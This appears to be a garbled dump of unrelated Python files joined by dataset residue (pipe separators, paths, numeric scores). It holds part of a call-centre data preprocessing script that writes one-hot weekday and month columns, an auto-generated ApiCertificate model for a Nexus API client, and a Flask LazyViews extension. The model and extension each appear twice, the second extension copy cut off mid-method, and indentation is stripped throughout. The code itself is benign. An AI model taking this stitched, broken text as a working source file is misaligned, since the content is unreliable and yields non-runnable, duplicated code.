out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;1;0;0;0;0;0;0;0;0;0;0;0;0;0;1;0;"+ass_assignment+"\n"
if month == 12:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;1;0;0;0;0;0;0;0;0;0;0;0;0;0;0;1;"+ass_assignment+"\n"
if (week_day == "Friday"):
if month == 1:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;1;0;0;1;0;0;0;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 2:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;1;0;0;0;1;0;0;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 3:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;1;0;0;0;0;1;0;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 4:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;1;0;0;0;0;0;1;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 5:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;1;0;0;0;0;0;0;1;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 6:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;1;0;0;0;0;0;0;0;1;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 7:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;1;0;0;0;0;0;0;0;0;1;0;0;0;0;0;"+ass_assignment+"\n"
if month == 8:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;1;0;0;0;0;0;0;0;0;0;1;0;0;0;0;"+ass_assignment+"\n"
if month == 9:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;1;0;0;0;0;0;0;0;0;0;0;1;0;0;0;"+ass_assignment+"\n"
if month == 10:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;1;0;0;0;0;0;0;0;0;0;0;0;1;0;0;"+ass_assignment+"\n"
if month == 11:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;1;0;0;0;0;0;0;0;0;0;0;0;0;1;0;"+ass_assignment+"\n"
if month == 12:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;1;0;0;0;0;0;0;0;0;0;0;0;0;0;1;"+ass_assignment+"\n"
if (week_day == "Saturday"):
if month == 1:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;0;1;0;1;0;0;0;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 2:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;0;1;0;0;1;0;0;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 3:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;0;1;0;0;0;1;0;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 4:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;0;1;0;0;0;0;1;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 5:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;0;1;0;0;0;0;0;1;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 6:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;0;1;0;0;0;0;0;0;1;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 7:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;0;1;0;0;0;0;0;0;0;1;0;0;0;0;0;"+ass_assignment+"\n"
if month == 8:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;0;1;0;0;0;0;0;0;0;0;1;0;0;0;0;"+ass_assignment+"\n"
if month == 9:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;0;1;0;0;0;0;0;0;0;0;0;1;0;0;0;"+ass_assignment+"\n"
if month == 10:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;0;1;0;0;0;0;0;0;0;0;0;0;1;0;0;"+ass_assignment+"\n"
if month == 11:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;0;1;0;0;0;0;0;0;0;0;0;0;0;1;0;"+ass_assignment+"\n"
if month == 12:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;0;1;0;0;0;0;0;0;0;0;0;0;0;0;1;"+ass_assignment+"\n"
if (week_day == "Sunday"):
if month == 1:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;0;0;1;1;0;0;0;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 2:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;0;0;1;0;1;0;0;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 3:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;0;0;1;0;0;1;0;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 4:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;0;0;1;0;0;0;1;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 5:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;0;0;1;0;0;0;0;1;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 6:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;0;0;1;0;0;0;0;0;1;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 7:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;0;0;1;0;0;0;0;0;0;1;0;0;0;0;0;"+ass_assignment+"\n"
if month == 8:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;0;0;1;0;0;0;0;0;0;0;1;0;0;0;0;"+ass_assignment+"\n"
if month == 9:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;0;0;1;0;0;0;0;0;0;0;0;1;0;0;0;"+ass_assignment+"\n"
if month == 10:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;0;0;1;0;0;0;0;0;0;0;0;0;1;0;0;"+ass_assignment+"\n"
if month == 11:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;0;0;1;0;0;0;0;0;0;0;0;0;0;1;0;"+ass_assignment+"\n"
if month == 12:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;0;0;1;0;0;0;0;0;0;0;0;0;0;0;1;"+ass_assignment+"\n"
return out_line
def run():
relevant_centers = ["CAT","CMS","Crises","Domicile","Gestion","Gestion - Accueil Telephonique",
"Gestion Assurances","Gestion Clients","Gestion_DZ","Gestion Relation Clienteles",
"Gestion Renault","Japon","Manager","Médical","Mécanicien","Nuit","Prestataires",
"RENAULT","Regulation Medicale","RTC","SAP","Services","Tech. Axa","Tech. Inter",
"Tech. Total","Téléphonie"]
with codecs.open("data/train_2011_2012_2013.csv", "r", encoding='utf-8') as in_file:
out = codecs.open('data/train.csv', 'w', encoding='utf-8')
first_line = True
line_counter = 0
total_lines = 10878471
print("Done: 0 lines", end="")
for line in in_file:
if line_counter % 1000 == 0:
print("\rDone: {}/{} ({}%) lines".format(line_counter, total_lines,
int(line_counter / total_lines * 100)), end="")
line = line.split('\n')[0]
if first_line:
line = line.split(";")
out.write(line[0]+";"+line[81]+";Hour;Monday;Tuesday;Wednesday;Thursday;Friday;Saturday;Sunday;January;February;March;April;May;June;July;August;September;October;November;December;"+line[12]+"\n")
first_line = False
line_counter += 1
continue
line = line.split(";")
if line[12] in relevant_centers:
timestamp = int(dg.date_to_timestamp(line[0]))
out_line = generate_line(timestamp, line[12], int(line[81]))
out.write(out_line)
line_counter += 1
print("\rDone: {}/{} ({}%) lines".format(line_counter, total_lines, int(line_counter / total_lines * 100)))
out.close()
#file = pd.read_csv('data/train.csv', sep = ';')
#file.sort_values('DATE',inplace=True)
#file.to_csv("data/train_sorted.csv", sep=";", encoding = 'utf-8', index=False)
if __name__ == "__main__":
run() | 0.015248 | 0.063599 |
import pprint
import re # noqa: F401
import six
from nexus_api_python_client.configuration import Configuration
class ApiCertificate(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'expires_on': 'int',
'fingerprint': 'str',
'id': 'str',
'issued_on': 'int',
'issuer_common_name': 'str',
'issuer_organization': 'str',
'issuer_organizational_unit': 'str',
'pem': 'str',
'serial_number': 'str',
'subject_common_name': 'str',
'subject_organization': 'str',
'subject_organizational_unit': 'str'
}
attribute_map = {
'expires_on': 'expiresOn',
'fingerprint': 'fingerprint',
'id': 'id',
'issued_on': 'issuedOn',
'issuer_common_name': 'issuerCommonName',
'issuer_organization': 'issuerOrganization',
'issuer_organizational_unit': 'issuerOrganizationalUnit',
'pem': 'pem',
'serial_number': 'serialNumber',
'subject_common_name': 'subjectCommonName',
'subject_organization': 'subjectOrganization',
'subject_organizational_unit': 'subjectOrganizationalUnit'
}
def __init__(self, expires_on=None, fingerprint=None, id=None, issued_on=None, issuer_common_name=None, issuer_organization=None, issuer_organizational_unit=None, pem=None, serial_number=None, subject_common_name=None, subject_organization=None, subject_organizational_unit=None, local_vars_configuration=None): # noqa: E501
"""ApiCertificate - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._expires_on = None
self._fingerprint = None
self._id = None
self._issued_on = None
self._issuer_common_name = None
self._issuer_organization = None
self._issuer_organizational_unit = None
self._pem = None
self._serial_number = None
self._subject_common_name = None
self._subject_organization = None
self._subject_organizational_unit = None
self.discriminator = None
if expires_on is not None:
self.expires_on = expires_on
if fingerprint is not None:
self.fingerprint = fingerprint
if id is not None:
self.id = id
if issued_on is not None:
self.issued_on = issued_on
if issuer_common_name is not None:
self.issuer_common_name = issuer_common_name
if issuer_organization is not None:
self.issuer_organization = issuer_organization
if issuer_organizational_unit is not None:
self.issuer_organizational_unit = issuer_organizational_unit
if pem is not None:
self.pem = pem
if serial_number is not None:
self.serial_number = serial_number
if subject_common_name is not None:
self.subject_common_name = subject_common_name
if subject_organization is not None:
self.subject_organization = subject_organization
if subject_organizational_unit is not None:
self.subject_organizational_unit = subject_organizational_unit
@property
def expires_on(self):
"""Gets the expires_on of this ApiCertificate. # noqa: E501
:return: The expires_on of this ApiCertificate. # noqa: E501
:rtype: int
"""
return self._expires_on
@expires_on.setter
def expires_on(self, expires_on):
"""Sets the expires_on of this ApiCertificate.
:param expires_on: The expires_on of this ApiCertificate. # noqa: E501
:type: int
"""
self._expires_on = expires_on
@property
def fingerprint(self):
"""Gets the fingerprint of this ApiCertificate. # noqa: E501
:return: The fingerprint of this ApiCertificate. # noqa: E501
:rtype: str
"""
return self._fingerprint
@fingerprint.setter
def fingerprint(self, fingerprint):
"""Sets the fingerprint of this ApiCertificate.
:param fingerprint: The fingerprint of this ApiCertificate. # noqa: E501
:type: str
"""
self._fingerprint = fingerprint
@property
def id(self):
"""Gets the id of this ApiCertificate. # noqa: E501
:return: The id of this ApiCertificate. # noqa: E501
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this ApiCertificate.
:param id: The id of this ApiCertificate. # noqa: E501
:type: str
"""
self._id = id
@property
def issued_on(self):
"""Gets the issued_on of this ApiCertificate. # noqa: E501
:return: The issued_on of this ApiCertificate. # noqa: E501
:rtype: int
"""
return self._issued_on
@issued_on.setter
def issued_on(self, issued_on):
"""Sets the issued_on of this ApiCertificate.
:param issued_on: The issued_on of this ApiCertificate. # noqa: E501
:type: int
"""
self._issued_on = issued_on
@property
def issuer_common_name(self):
"""Gets the issuer_common_name of this ApiCertificate. # noqa: E501
:return: The issuer_common_name of this ApiCertificate. # noqa: E501
:rtype: str
"""
return self._issuer_common_name
@issuer_common_name.setter
def issuer_common_name(self, issuer_common_name):
"""Sets the issuer_common_name of this ApiCertificate.
:param issuer_common_name: The issuer_common_name of this ApiCertificate. # noqa: E501
:type: str
"""
self._issuer_common_name = issuer_common_name
@property
def issuer_organization(self):
"""Gets the issuer_organization of this ApiCertificate. # noqa: E501
:return: The issuer_organization of this ApiCertificate. # noqa: E501
:rtype: str
"""
return self._issuer_organization
@issuer_organization.setter
def issuer_organization(self, issuer_organization):
"""Sets the issuer_organization of this ApiCertificate.
:param issuer_organization: The issuer_organization of this ApiCertificate. # noqa: E501
:type: str
"""
self._issuer_organization = issuer_organization
@property
def issuer_organizational_unit(self):
"""Gets the issuer_organizational_unit of this ApiCertificate. # noqa: E501
:return: The issuer_organizational_unit of this ApiCertificate. # noqa: E501
:rtype: str
"""
return self._issuer_organizational_unit
@issuer_organizational_unit.setter
def issuer_organizational_unit(self, issuer_organizational_unit):
"""Sets the issuer_organizational_unit of this ApiCertificate.
:param issuer_organizational_unit: The issuer_organizational_unit of this ApiCertificate. # noqa: E501
:type: str
"""
self._issuer_organizational_unit = issuer_organizational_unit
@property
def pem(self):
"""Gets the pem of this ApiCertificate. # noqa: E501
:return: The pem of this ApiCertificate. # noqa: E501
:rtype: str
"""
return self._pem
@pem.setter
def pem(self, pem):
"""Sets the pem of this ApiCertificate.
:param pem: The pem of this ApiCertificate. # noqa: E501
:type: str
"""
self._pem = pem
@property
def serial_number(self):
"""Gets the serial_number of this ApiCertificate. # noqa: E501
:return: The serial_number of this ApiCertificate. # noqa: E501
:rtype: str
"""
return self._serial_number
@serial_number.setter
def serial_number(self, serial_number):
"""Sets the serial_number of this ApiCertificate.
:param serial_number: The serial_number of this ApiCertificate. # noqa: E501
:type: str
"""
self._serial_number = serial_number
@property
def subject_common_name(self):
"""Gets the subject_common_name of this ApiCertificate. # noqa: E501
:return: The subject_common_name of this ApiCertificate. # noqa: E501
:rtype: str
"""
return self._subject_common_name
@subject_common_name.setter
def subject_common_name(self, subject_common_name):
"""Sets the subject_common_name of this ApiCertificate.
:param subject_common_name: The subject_common_name of this ApiCertificate. # noqa: E501
:type: str
"""
self._subject_common_name = subject_common_name
@property
def subject_organization(self):
"""Gets the subject_organization of this ApiCertificate. # noqa: E501
:return: The subject_organization of this ApiCertificate. # noqa: E501
:rtype: str
"""
return self._subject_organization
@subject_organization.setter
def subject_organization(self, subject_organization):
"""Sets the subject_organization of this ApiCertificate.
:param subject_organization: The subject_organization of this ApiCertificate. # noqa: E501
:type: str
"""
self._subject_organization = subject_organization
@property
def subject_organizational_unit(self):
"""Gets the subject_organizational_unit of this ApiCertificate. # noqa: E501
:return: The subject_organizational_unit of this ApiCertificate. # noqa: E501
:rtype: str
"""
return self._subject_organizational_unit
@subject_organizational_unit.setter
def subject_organizational_unit(self, subject_organizational_unit):
"""Sets the subject_organizational_unit of this ApiCertificate.
:param subject_organizational_unit: The subject_organizational_unit of this ApiCertificate. # noqa: E501
:type: str
"""
self._subject_organizational_unit = subject_organizational_unit
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ApiCertificate):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, ApiCertificate):
return True
return self.to_dict() != other.to_dict() | nexus_api_python_client/models/api_certificate.py | import pprint
import re # noqa: F401
import six
from nexus_api_python_client.configuration import Configuration
class ApiCertificate(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'expires_on': 'int',
'fingerprint': 'str',
'id': 'str',
'issued_on': 'int',
'issuer_common_name': 'str',
'issuer_organization': 'str',
'issuer_organizational_unit': 'str',
'pem': 'str',
'serial_number': 'str',
'subject_common_name': 'str',
'subject_organization': 'str',
'subject_organizational_unit': 'str'
}
attribute_map = {
'expires_on': 'expiresOn',
'fingerprint': 'fingerprint',
'id': 'id',
'issued_on': 'issuedOn',
'issuer_common_name': 'issuerCommonName',
'issuer_organization': 'issuerOrganization',
'issuer_organizational_unit': 'issuerOrganizationalUnit',
'pem': 'pem',
'serial_number': 'serialNumber',
'subject_common_name': 'subjectCommonName',
'subject_organization': 'subjectOrganization',
'subject_organizational_unit': 'subjectOrganizationalUnit'
}
def __init__(self, expires_on=None, fingerprint=None, id=None, issued_on=None, issuer_common_name=None, issuer_organization=None, issuer_organizational_unit=None, pem=None, serial_number=None, subject_common_name=None, subject_organization=None, subject_organizational_unit=None, local_vars_configuration=None): # noqa: E501
"""ApiCertificate - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._expires_on = None
self._fingerprint = None
self._id = None
self._issued_on = None
self._issuer_common_name = None
self._issuer_organization = None
self._issuer_organizational_unit = None
self._pem = None
self._serial_number = None
self._subject_common_name = None
self._subject_organization = None
self._subject_organizational_unit = None
self.discriminator = None
if expires_on is not None:
self.expires_on = expires_on
if fingerprint is not None:
self.fingerprint = fingerprint
if id is not None:
self.id = id
if issued_on is not None:
self.issued_on = issued_on
if issuer_common_name is not None:
self.issuer_common_name = issuer_common_name
if issuer_organization is not None:
self.issuer_organization = issuer_organization
if issuer_organizational_unit is not None:
self.issuer_organizational_unit = issuer_organizational_unit
if pem is not None:
self.pem = pem
if serial_number is not None:
self.serial_number = serial_number
if subject_common_name is not None:
self.subject_common_name = subject_common_name
if subject_organization is not None:
self.subject_organization = subject_organization
if subject_organizational_unit is not None:
self.subject_organizational_unit = subject_organizational_unit
@property
def expires_on(self):
"""Gets the expires_on of this ApiCertificate. # noqa: E501
:return: The expires_on of this ApiCertificate. # noqa: E501
:rtype: int
"""
return self._expires_on
@expires_on.setter
def expires_on(self, expires_on):
"""Sets the expires_on of this ApiCertificate.
:param expires_on: The expires_on of this ApiCertificate. # noqa: E501
:type: int
"""
self._expires_on = expires_on
@property
def fingerprint(self):
"""Gets the fingerprint of this ApiCertificate. # noqa: E501
:return: The fingerprint of this ApiCertificate. # noqa: E501
:rtype: str
"""
return self._fingerprint
@fingerprint.setter
def fingerprint(self, fingerprint):
"""Sets the fingerprint of this ApiCertificate.
:param fingerprint: The fingerprint of this ApiCertificate. # noqa: E501
:type: str
"""
self._fingerprint = fingerprint
@property
def id(self):
"""Gets the id of this ApiCertificate. # noqa: E501
:return: The id of this ApiCertificate. # noqa: E501
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this ApiCertificate.
:param id: The id of this ApiCertificate. # noqa: E501
:type: str
"""
self._id = id
@property
def issued_on(self):
"""Gets the issued_on of this ApiCertificate. # noqa: E501
:return: The issued_on of this ApiCertificate. # noqa: E501
:rtype: int
"""
return self._issued_on
@issued_on.setter
def issued_on(self, issued_on):
"""Sets the issued_on of this ApiCertificate.
:param issued_on: The issued_on of this ApiCertificate. # noqa: E501
:type: int
"""
self._issued_on = issued_on
@property
def issuer_common_name(self):
"""Gets the issuer_common_name of this ApiCertificate. # noqa: E501
:return: The issuer_common_name of this ApiCertificate. # noqa: E501
:rtype: str
"""
return self._issuer_common_name
@issuer_common_name.setter
def issuer_common_name(self, issuer_common_name):
"""Sets the issuer_common_name of this ApiCertificate.
:param issuer_common_name: The issuer_common_name of this ApiCertificate. # noqa: E501
:type: str
"""
self._issuer_common_name = issuer_common_name
@property
def issuer_organization(self):
"""Gets the issuer_organization of this ApiCertificate. # noqa: E501
:return: The issuer_organization of this ApiCertificate. # noqa: E501
:rtype: str
"""
return self._issuer_organization
@issuer_organization.setter
def issuer_organization(self, issuer_organization):
"""Sets the issuer_organization of this ApiCertificate.
:param issuer_organization: The issuer_organization of this ApiCertificate. # noqa: E501
:type: str
"""
self._issuer_organization = issuer_organization
@property
def issuer_organizational_unit(self):
"""Gets the issuer_organizational_unit of this ApiCertificate. # noqa: E501
:return: The issuer_organizational_unit of this ApiCertificate. # noqa: E501
:rtype: str
"""
return self._issuer_organizational_unit
@issuer_organizational_unit.setter
def issuer_organizational_unit(self, issuer_organizational_unit):
"""Sets the issuer_organizational_unit of this ApiCertificate.
:param issuer_organizational_unit: The issuer_organizational_unit of this ApiCertificate. # noqa: E501
:type: str
"""
self._issuer_organizational_unit = issuer_organizational_unit
@property
def pem(self):
"""Gets the pem of this ApiCertificate. # noqa: E501
:return: The pem of this ApiCertificate. # noqa: E501
:rtype: str
"""
return self._pem
@pem.setter
def pem(self, pem):
"""Sets the pem of this ApiCertificate.
:param pem: The pem of this ApiCertificate. # noqa: E501
:type: str
"""
self._pem = pem
@property
def serial_number(self):
"""Gets the serial_number of this ApiCertificate. # noqa: E501
:return: The serial_number of this ApiCertificate. # noqa: E501
:rtype: str
"""
return self._serial_number
@serial_number.setter
def serial_number(self, serial_number):
"""Sets the serial_number of this ApiCertificate.
:param serial_number: The serial_number of this ApiCertificate. # noqa: E501
:type: str
"""
self._serial_number = serial_number
@property
def subject_common_name(self):
"""Gets the subject_common_name of this ApiCertificate. # noqa: E501
:return: The subject_common_name of this ApiCertificate. # noqa: E501
:rtype: str
"""
return self._subject_common_name
@subject_common_name.setter
def subject_common_name(self, subject_common_name):
"""Sets the subject_common_name of this ApiCertificate.
:param subject_common_name: The subject_common_name of this ApiCertificate. # noqa: E501
:type: str
"""
self._subject_common_name = subject_common_name
@property
def subject_organization(self):
"""Gets the subject_organization of this ApiCertificate. # noqa: E501
:return: The subject_organization of this ApiCertificate. # noqa: E501
:rtype: str
"""
return self._subject_organization
@subject_organization.setter
def subject_organization(self, subject_organization):
"""Sets the subject_organization of this ApiCertificate.
:param subject_organization: The subject_organization of this ApiCertificate. # noqa: E501
:type: str
"""
self._subject_organization = subject_organization
@property
def subject_organizational_unit(self):
"""Gets the subject_organizational_unit of this ApiCertificate. # noqa: E501
:return: The subject_organizational_unit of this ApiCertificate. # noqa: E501
:rtype: str
"""
return self._subject_organizational_unit
@subject_organizational_unit.setter
def subject_organizational_unit(self, subject_organizational_unit):
"""Sets the subject_organizational_unit of this ApiCertificate.
:param subject_organizational_unit: The subject_organizational_unit of this ApiCertificate. # noqa: E501
:type: str
"""
self._subject_organizational_unit = subject_organizational_unit
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ApiCertificate):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, ApiCertificate):
return True
return self.to_dict() != other.to_dict() | 0.607081 | 0.081593 |
import sys
from functools import partial
from flask import render_template
from .utils import LazyView
__all__ = ('LazyViews', )
string_types = (str, unicode) if sys.version_info[0] < 3 else (str, ) # noqa
class LazyViews(object):
"""
Main instance for adding *lazy* views to Flask application or blueprint.
"""
__slots__ = ('import_prefix', 'instance')
def __init__(self, instance=None, import_prefix=None):
"""
Initialize :class:`LazyViews` instance.
Basically it requires ``app`` or ``blueprint`` instance as first
argument, but you could leave it empty and initialize it later with
manually call :meth:`init_app` method. It could be helpful, if you want
to configure :class:`LazyViews` instance somewhere outside your
``app.py`` or for multiple applications.
"""
# Keep import prefix state to have ability reuse it later
self.import_prefix = import_prefix
self.instance = None
if instance:
self.init_app(instance, import_prefix)
def add(self, url_rule, mixed, **options):
"""
Add URL rule to Flask application or blueprint.
``mixed`` could be a real callable function, or a string Python path
to callable view function. If ``mixed`` is a string, it would be
wrapped into :class:`~flask_lazyviews.utils.LazyView` instance.
"""
assert self.instance, 'LazyViews instance is not properly initialized.'
options['view_func'] = self.get_view(mixed)
self.instance.add_url_rule(url_rule, **options)
def add_admin(self, mixed, *args, **kwargs):
"""
Add admin view if `Flask-Admin <http://flask-admin.readthedocs.org/>`_
extension added to application.
.. important:: This method only works for Flask applications, not
blueprints.
"""
assert self.instance, 'LazyViews instance is not properly initialized.'
if not hasattr(self.instance, 'blueprints'):
raise ValueError('Cannot add admin view to blueprint.')
app = self.instance
if 'admin' not in app.extensions:
raise ValueError('Looks like, Flask-Admin extension not added '
'to current application, {0!r}'.format(app))
admin = app.extensions['admin']
admin = admin[0] if isinstance(admin, list) else admin
view = self.get_view(mixed)
if isinstance(view, LazyView):
view = view(*args, **kwargs)
admin.add_view(view)
def add_error(self, code_or_exception, mixed, app=False):
"""
Add error handler to Flask application or blueprint.
When passing ``app=True`` tries to register global app error handler
for blueprint.
"""
assert self.instance, 'LazyViews instance is not properly initialized.'
app_handler = getattr(self.instance, 'app_errorhandler', None)
handler = self.instance.errorhandler
method = app_handler if app and app_handler else handler
method(code_or_exception)(self.get_view(mixed))
def add_static(self, url_rule, filename=None, **options):
"""
Add URL rule for serving static files to Flask app or blueprint.
"""
assert self.instance, 'LazyViews instance is not properly initialized.'
if filename:
options.setdefault('defaults', {}).update({'filename': filename})
self.add(url_rule, self.instance.send_static_file, **options)
def add_template(self, url_rule, template_name, **options):
"""
Render template name with context for given URL rule.
Context should be a plain dict or callable. If callable its result
would be passed to :func:`flask.render_template` function.
"""
assert self.instance, 'LazyViews instance is not properly initialized.'
def renderer(template_name, mixed):
context = mixed() if callable(mixed) else mixed or {}
return partial(render_template, template_name, **context)
view = renderer(template_name, options.pop('context', None))
self.add(url_rule, view, **options)
def build_import_name(self, import_name):
"""
Prepend import prefix to import name if it earlier defined by user.
"""
return '.'.join(filter(None, (self.import_prefix, import_name)))
def get_view(self, mixed):
"""
If ``mixed`` value is callable it's our view, else wrap it with
:class:`flask_lazyviews.utils.LazyView` instance.
"""
if callable(mixed) or not isinstance(mixed, string_types):
return mixed
return LazyView(self.build_import_name(mixed))
def init_app(self, app, import_prefix=None):
"""
Configure :class:`LazyViews` instance, store ``app`` or ``blueprint``
instance and import prefix if any.
"""
if import_prefix and import_prefix.startswith('.'):
import_name = (app.import_name
if app.import_name != '__main__'
else '')
assert import_name, ('You should properly configure import name '
'for {0!r} instance or edit import prefix to '
'not start with ".".'.format(app))
import_prefix = import_name + import_prefix
self.import_prefix = import_prefix or self.import_prefix
self.instance = app
def init_blueprint(self, blueprint, import_prefix=None):
"""
Alias for init app function, cause basically there are no important
differences between Flask app and blueprint if we only need to add URL
rule.
"""
return self.init_app(blueprint, import_prefix) | flask_lazyviews/lazyviews.py | import sys
from functools import partial
from flask import render_template
from .utils import LazyView
__all__ = ('LazyViews', )
string_types = (str, unicode) if sys.version_info[0] < 3 else (str, ) # noqa
class LazyViews(object):
"""
Main instance for adding *lazy* views to Flask application or blueprint.
"""
__slots__ = ('import_prefix', 'instance')
def __init__(self, instance=None, import_prefix=None):
"""
Initialize :class:`LazyViews` instance.
Basically it requires ``app`` or ``blueprint`` instance as first
argument, but you could leave it empty and initialize it later with
manually call :meth:`init_app` method. It could be helpful, if you want
to configure :class:`LazyViews` instance somewhere outside your
``app.py`` or for multiple applications.
"""
# Keep import prefix state to have ability reuse it later
self.import_prefix = import_prefix
self.instance = None
if instance:
self.init_app(instance, import_prefix)
def add(self, url_rule, mixed, **options):
"""
Add URL rule to Flask application or blueprint.
``mixed`` could be a real callable function, or a string Python path
to callable view function. If ``mixed`` is a string, it would be
wrapped into :class:`~flask_lazyviews.utils.LazyView` instance.
"""
assert self.instance, 'LazyViews instance is not properly initialized.'
options['view_func'] = self.get_view(mixed)
self.instance.add_url_rule(url_rule, **options)
def add_admin(self, mixed, *args, **kwargs):
"""
Add admin view if `Flask-Admin <http://flask-admin.readthedocs.org/>`_
extension added to application.
.. important:: This method only works for Flask applications, not
blueprints.
"""
assert self.instance, 'LazyViews instance is not properly initialized.'
if not hasattr(self.instance, 'blueprints'):
raise ValueError('Cannot add admin view to blueprint.')
app = self.instance
if 'admin' not in app.extensions:
raise ValueError('Looks like, Flask-Admin extension not added '
'to current application, {0!r}'.format(app))
admin = app.extensions['admin']
admin = admin[0] if isinstance(admin, list) else admin
view = self.get_view(mixed)
if isinstance(view, LazyView):
view = view(*args, **kwargs)
admin.add_view(view)
def add_error(self, code_or_exception, mixed, app=False):
"""
Add error handler to Flask application or blueprint.
When passing ``app=True`` tries to register global app error handler
for blueprint.
"""
assert self.instance, 'LazyViews instance is not properly initialized.'
